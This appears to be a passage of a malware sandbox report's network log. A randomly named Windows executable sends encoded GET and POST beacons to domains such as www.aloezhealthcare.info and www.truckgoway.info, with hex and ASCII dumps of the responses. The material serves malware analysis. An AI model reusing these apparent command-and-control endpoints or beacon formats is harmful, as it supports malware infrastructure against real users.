                                                                              Data Ascii: t0A=CjcpzjRL9l2ZUuWU1kQNOio0uBTs5cwKyNPsjAhqpI0yZrEMXoTacAdE4j7KhzM2ygvyJF4u81zRIh1Ze73TtSan9dYsSvF0F6iOrzqUpf5otGO7k+s3/SGYn4ipBVaaZD0H0o9L1C9wnzIy4QyRiiCM868yESPkpI6GtO1rMPVs5FG8JrGe4xzgAmfmeYWi0K3MQE7rpq4jyWNqLC0+jyARZJV9r1qsK/3u8nOjiLxJdKVtyCMdzFhYE8Db6oJP773UkWJXtcoDT2fWevlrde2S8ba+NTZs8EGvTnDjTK1F1awpU5JOBJBly9GfINX5xtscdIzQUpqqB5dcluSVVf1H021WM3TJhdqnxSYAbB4P9/B3o0VjXw+UGSojP7QGEiVkC5qLlPgHbdotPzJaNWkCAUGRAlUfbIonq30aIL2ZEuf4bHHkZhRnQSgmcGp7ksNeMGtKoFVsGs4MJBHQ3N7CWac8WkUYD0U2bGm1fYnmvq8Ho9Td4oNhLcDYqtGtlu3pyrHoXQm652Behv5VJG3h3uxUeNt1+CMyUDIO/Apw7lco9pafe3X5Zu5Y2oYqFyzE0MgSpS1wWxTyewVyw0gqyghDFWISbjoTq91DGoceLR8765l4bmXXBE661vowzpbh8iQj+jLZykMpX7YxutSVh0Xj1rg4jbAqpArRJrJRsd/m7swqW1AxL3do24ave1gwMhRA9yHngSSLFnApp+4/jdZEm0TqTm5CzeP0tMH/At2+T0d8+9fqrE0b7YCIp8kbPNga1FyIc5sT2VxwkXz2ETEbOP7U+CEiesGHBOwp+GgCYtDuVd8bdg80O3fOajHoghCbrApp/ZksujeYBQ2U+2d8iIEcwe4gyM4skuYxyq/YCpioaK87PS9ggU/HVIpSdZK+XOP52sT5MmIBDpaUK6Zuyigu0wkBZ080b9QB8oR1URwgz6ggmXiAqdjPl8cJ3zvU1SWGTkncNq9OIAnMqKyaxEH0lciGiIkmth0U35Jx [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.54949484.32.84.32802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:30.803652048 CET397OUTGET /m320/?t0A=Ph0JwVcw7zzuTeHg00MwOUpuuzX2vc4K5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsllCIycJgVOFGc42mqBi0wPhTxFehoqUxxUf8xIGnP1n2EQ==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.truckgoway.info
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:03:31.247462988 CET1236INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 11:03:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 9973
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Server: hcdn
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              x-hcdn-request-id: f8752071b58a0e55ce23713f1e3fd4de-bos-edge1
                                                                              Expires: Tue, 14 Jan 2025 11:03:30 GMT
                                                                              Cache-Control: no-cache
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                              Jan 14, 2025 12:03:31.247546911 CET224INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                              Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30
                                                                              Jan 14, 2025 12:03:31.247581005 CET1236INData Raw: 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74 2d
                                                                              Data Ascii: px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:0
                                                                              Jan 14, 2025 12:03:31.247628927 CET1236INData Raw: 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f 72
                                                                              Data Ascii: lign:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px;
                                                                              Jan 14, 2025 12:03:31.247664928 CET1236INData Raw: 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30
                                                                              Data Ascii: align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{disp
                                                                              Jan 14, 2025 12:03:31.247704029 CET672INData Raw: 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 20 72 65 6c 3d 6e 6f 66 6f
                                                                              Data Ascii: cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class
                                                                              Jan 14, 2025 12:03:31.247745037 CET1236INData Raw: 20 75 73 69 6e 67 20 48 6f 73 74 69 6e 67 65 72 20 6e 61 6d 65 73 65 72 76 65 72 73 2e 20 54 61 6b 65 20 74 68 65 20 72 65 63 6f 6d 6d 65 6e 64 65 64 20 73 74 65 70 73 20 62 65 6c 6f 77 20 74 6f 20 63 6f 6e 74 69 6e 75 65 20 79 6f 75 72 20 6a 6f
                                                                              Data Ascii: using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=domain-default-img.svg></div><div class=col-xs-12><div class=section-title>What's next?</div></div><div class="clearfix c
                                                                              Jan 14, 2025 12:03:31.247781038 CET1236INData Raw: 65 6d 65 6e 74 20 70 61 67 65 20 6f 66 20 79 6f 75 72 20 48 6f 73 74 69 6e 67 65 72 20 61 63 63 6f 75 6e 74 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d
                                                                              Data Ascii: ement page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){
                                                                              Jan 14, 2025 12:03:31.247816086 CET1236INData Raw: 6e 67 65 45 72 72 6f 72 28 22 49 6c 6c 65 67 61 6c 20 69 6e 70 75 74 20 3e 3d 20 30 78 38 30 22 29 3b 6d 2e 70 75 73 68 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 29 7d 66 6f 72 28 64 3d 30 3c 63 3f 63 2b 31 3a 30 3b 64 3c 45 3b 29 7b 66 6f
                                                                              Data Ascii: ngeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeError("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("p
                                                                              Jan 14, 2025 12:03:31.247850895 CET104INData Raw: 68 3d 6c 2c 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68
                                                                              Data Ascii: h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g
                                                                              Jan 14, 2025 12:03:31.248250008 CET660INData Raw: 3c 3d 75 3f 31 3a 75 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 75 29 29 3b 67 2b 3d 6f 29 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 28 73 2b 28 70 2d 73 29 25 28 6f 2d 73 29 2c 30 29 29 29 2c 70 3d 4d 61 74 68
                                                                              Data Ascii: <=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split(


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.549495213.171.195.105802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:36.311620951 CET680OUTPOST /he9k/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aloezhealthcare.info
                                                                              Origin: http://www.aloezhealthcare.info
                                                                              Referer: http://www.aloezhealthcare.info/he9k/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 35 4f 67 61 39 45 7a 6a 68 45 52 73 30 46 2f 6f 62 73 58 61 32 47 71 73 70 4b 34 4c 45 7a 64 76 44 31 42 74 63 42 6b 2b 67 7a 64 4c 4c 6c 31 41 68 4f 62 75 54 4d 7a 43 53 5a 47 50 70 32 30 70 52 44 77 6d 64 63 59 41 58 49 58 59 61 73 4f 35 36 51 7a 32 36 50 59 67 33 47 39 33 42 41 46 4c 59 4b 6e 71 4a 50 68 68 78 41 73 75 6e 73 52 59 39 6b 4b 7a 30 4a 52 73 4c 63 58 54 39 36 49 77 39 54 52 37 6c 4d 77 6b 6c 35 6a 65 70 66 51 6d 76 4f 35 77 59 75 4e 2b 30 35 55 55 56 49 75 71 58 63 67 59 77 61 44 30 59 49 72 53 47 51 65 67 5a 6e 41 63 51 33 4b 35 44 61 57 5a 70 47 4b 59 45 41 61 33 6a 42 38 3d
                                                                              Data Ascii: t0A=5Oga9EzjhERs0F/obsXa2GqspK4LEzdvD1BtcBk+gzdLLl1AhObuTMzCSZGPp20pRDwmdcYAXIXYasO56Qz26PYg3G93BAFLYKnqJPhhxAsunsRY9kKz0JRsLcXT96Iw9TR7lMwkl5jepfQmvO5wYuN+05UUVIuqXcgYwaD0YIrSGQegZnAcQ3K5DaWZpGKYEAa3jB8=
                                                                              Jan 14, 2025 12:03:36.910003901 CET309INHTTP/1.1 405 Not Allowed
                                                                              server: nginx/1.20.1
                                                                              date: Tue, 14 Jan 2025 11:03:36 GMT
                                                                              content-type: text/html
                                                                              content-length: 157
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.549496213.171.195.105802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:38.849809885 CET700OUTPOST /he9k/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aloezhealthcare.info
                                                                              Origin: http://www.aloezhealthcare.info
                                                                              Referer: http://www.aloezhealthcare.info/he9k/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 35 4f 67 61 39 45 7a 6a 68 45 52 73 31 6d 6e 6f 65 50 2f 61 6a 32 71 74 73 4b 34 4c 4e 54 64 72 44 31 4e 74 63 46 39 31 68 42 35 4c 49 45 46 41 69 50 62 75 55 4d 7a 43 4b 4a 47 47 6d 57 31 72 52 44 4e 54 64 63 55 41 58 49 44 59 61 75 57 35 36 68 7a 31 37 66 59 69 6a 32 39 31 63 51 46 4c 59 4b 6e 71 4a 50 30 38 78 41 30 75 6e 66 35 59 73 78 32 77 71 5a 52 76 49 63 58 54 35 36 4a 37 39 54 52 56 6c 4e 73 65 6c 39 54 65 70 61 30 6d 32 2f 35 7a 54 75 4e 6b 35 5a 55 45 59 73 69 6c 4f 4e 64 59 74 4b 4f 4e 4c 36 7a 31 44 6d 76 4b 44 46 49 30 44 58 6d 42 54 4a 65 75 34 32 72 78 65 6a 4b 48 39 57 71 64 4b 54 6c 4c 74 63 31 67 69 79 46 63 64 53 30 6a 6d 56 74 47
                                                                              Data Ascii: t0A=5Oga9EzjhERs1mnoeP/aj2qtsK4LNTdrD1NtcF91hB5LIEFAiPbuUMzCKJGGmW1rRDNTdcUAXIDYauW56hz17fYij291cQFLYKnqJP08xA0unf5Ysx2wqZRvIcXT56J79TRVlNsel9Tepa0m2/5zTuNk5ZUEYsilONdYtKONL6z1DmvKDFI0DXmBTJeu42rxejKH9WqdKTlLtc1giyFcdS0jmVtG
                                                                              Jan 14, 2025 12:03:39.429853916 CET309INHTTP/1.1 405 Not Allowed
                                                                              server: nginx/1.20.1
                                                                              date: Tue, 14 Jan 2025 11:03:39 GMT
                                                                              content-type: text/html
                                                                              content-length: 157
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.549497213.171.195.105802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:41.404009104 CET1717OUTPOST /he9k/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aloezhealthcare.info
                                                                              Origin: http://www.aloezhealthcare.info
                                                                              Referer: http://www.aloezhealthcare.info/he9k/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 35 4f 67 61 39 45 7a 6a 68 45 52 73 31 6d 6e 6f 65 50 2f 61 6a 32 71 74 73 4b 34 4c 4e 54 64 72 44 31 4e 74 63 46 39 31 68 42 78 4c 49 32 64 41 69 73 6a 75 56 4d 7a 43 55 5a 47 44 6d 57 31 71 52 44 56 58 64 63 6f 32 58 4f 50 59 63 4c 4b 35 79 31 48 31 79 66 59 69 38 6d 39 30 42 41 45 66 59 4b 57 6a 4a 50 6b 38 78 41 30 75 6e 61 39 59 38 55 4b 77 6f 5a 52 73 4c 63 58 58 39 36 49 63 39 54 4a 6a 6c 4e 34 30 6b 4f 62 65 70 36 45 6d 74 74 52 7a 50 2b 4e 36 34 5a 56 62 59 72 72 6c 4f 4e 41 68 74 4b 36 72 4c 34 6a 31 41 43 6d 75 51 42 5a 75 41 52 33 69 58 4b 58 4f 6e 77 6a 76 42 67 58 30 37 6c 58 39 42 41 4e 53 72 73 41 6c 6e 68 6b 34 44 55 49 6c 69 6a 34 39 45 70 6b 2b 65 37 51 66 37 31 76 55 63 56 55 42 54 65 34 36 35 68 38 54 72 43 4f 43 67 31 78 69 45 74 48 70 35 34 71 55 33 58 54 73 54 70 74 54 43 63 75 30 36 70 67 76 67 30 58 37 6e 31 43 32 4c 6f 79 63 72 52 52 59 48 57 67 59 4c 6a 6d 54 6f 6a 42 78 76 33 57 4e 65 63 4a 4a 35 78 4b 4b 52 67 4c 79 6b 74 65 67 56 33 79 34 58 70 43 65 75 4b [TRUNCATED]
                                                                              Data Ascii: t0A=5Oga9EzjhERs1mnoeP/aj2qtsK4LNTdrD1NtcF91hBxLI2dAisjuVMzCUZGDmW1qRDVXdco2XOPYcLK5y1H1yfYi8m90BAEfYKWjJPk8xA0una9Y8UKwoZRsLcXX96Ic9TJjlN40kObep6EmttRzP+N64ZVbYrrlONAhtK6rL4j1ACmuQBZuAR3iXKXOnwjvBgX07lX9BANSrsAlnhk4DUIlij49Epk+e7Qf71vUcVUBTe465h8TrCOCg1xiEtHp54qU3XTsTptTCcu06pgvg0X7n1C2LoycrRRYHWgYLjmTojBxv3WNecJJ5xKKRgLyktegV3y4XpCeuKRFeM2ghJ8f2vq1QAbZ+3gASMqtbjSvJGpc4KQc9Mwn++rAQcomU/RWnSGylUtdxUjNd1Y+cs8fIlplx7hpeFkbdCOqRHLsND9vK7xkzQZfvJJXLehZlywEi073zrOWN0jT5AUYZnVzm+DUWG1xfeWpFbti+8oEzBFlu1Yni0bQHCw33rJkyiJ5P0qoyANdj9BnOxE8yzvX6sgk3V2S4oyesRf0jjaIJJrZ7w9qn0JpNHOKk1e6NRgEjX/goynL41N3rBtPy/JITO1NvWGctcF3yv+MhiQdWzwH/nsWkx1/mj1huTBZ5qNtMx5n+0H+LOJDNMm5DVee8+tBhZRSCPFpNC5JAbJ6jVKjlrjq7S8jNLNU7mrAFD0AVRgcnkTRqlhkfkHcASVch4x2w8H57xD/0+S52LAZ4EO2UXiVTSgAeZuDUB6opVLJPk4s3cyrtX9rrkq1msoP69DaoY4hMO1czp/GkUD6mbOACAYUIfx8XnxrmfOPqzw5WUF8UpciTJX0n3XGyDl8naxh1rOHlHYhmFdwcIGc1fHSeIaz+IsIyi4ibft0g7sPnQcJbaowtu+BCTiFynaHmAHem8XoXU5jILLj6eOl5uv2vy8gyrPeR0ckx14DYVCvsNS65j1EfeZA0aMj3kZrNaHzdgmmjl3R2CLX8q8Fho4C [TRUNCATED]
                                                                              Jan 14, 2025 12:03:41.980588913 CET309INHTTP/1.1 405 Not Allowed
                                                                              server: nginx/1.20.1
                                                                              date: Tue, 14 Jan 2025 11:03:41 GMT
                                                                              content-type: text/html
                                                                              content-length: 157
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.549498213.171.195.105802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:43.941021919 CET402OUTGET /he9k/?t0A=0MI6+xzwqxZaqD2cO/aG/zu1oIMhaBkQNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOxoEk511kfBxpEvGLE/kVuVEOyttA6Fi+saUHPe6X4Jt0hg==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.aloezhealthcare.info
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:03:44.546082973 CET1236INHTTP/1.1 200 OK
                                                                              server: nginx/1.20.1
                                                                              date: Tue, 14 Jan 2025 11:03:44 GMT
                                                                              content-type: text/html
                                                                              content-length: 2862
                                                                              last-modified: Wed, 27 Nov 2024 10:28:56 GMT
                                                                              etag: "6746f468-b2e"
                                                                              accept-ranges: bytes
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2f 63 73 73 2f 69 6e 64 65 78 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 66 61 73 [TRUNCATED]
